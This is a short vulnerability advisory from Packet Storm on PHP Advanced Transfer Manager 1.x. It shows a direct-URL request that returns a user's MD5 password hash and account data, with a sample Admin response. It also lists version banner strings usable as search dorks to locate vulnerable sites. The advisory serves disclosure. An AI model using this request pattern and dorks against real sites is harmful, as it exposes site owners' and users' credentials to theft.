It is possible to download the users password hashed in PHP Advanced Transfer Manager 1.x via a special URL.
94dd1adf4a7926508e3f52f536f7a190f575b355f715a85e793baf17aa2aa609PHP Advanced Transfer Manager Download users password hashes
PHP Advanced Transfer Manager 1.*
Site:http://phpatm.free.fr/
----------------------------------------------------
Bugs:
http://victim.com/path/users/username
----------------------------------------------------
example:
http://www.victim.com/Path/users/Admin
3a23bb515e06d0e944ff916e79a7775c ------>md5
0
victim@victim.co.za
0
1
1
1026836078
en
----------------------------------------------------
Vulnerabilities :
"Powered by PHP Advanced Transfer Manager v1.00"
"Powered by PHP Advanced Transfer Manager v1.01"
"Powered by PHP Advanced Transfer Manager v1.02"
"Powered by PHP Advanced Transfer Manager v1.03"
"Powered by PHP Advanced Transfer Manager v1.10"
"Powered by PHP Advanced Transfer Manager v1.22"
"Powered by PHP Advanced Transfer Manager v1.21"
"Powered by PHP Advanced Transfer Manager v1.20"
"Powered by PHP Advanced Transfer Manager v1.30"
-----------------------------------------------------
Credit :Liz0ziM
Website:www.biyosecurity.com
Mail :liz0@bsdmail.com
------------------------------------------------------
Source:
http://www.blogcu.com/Liz0ziM/316652/
http://biyosecurity.be/bugs/patm.txt
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed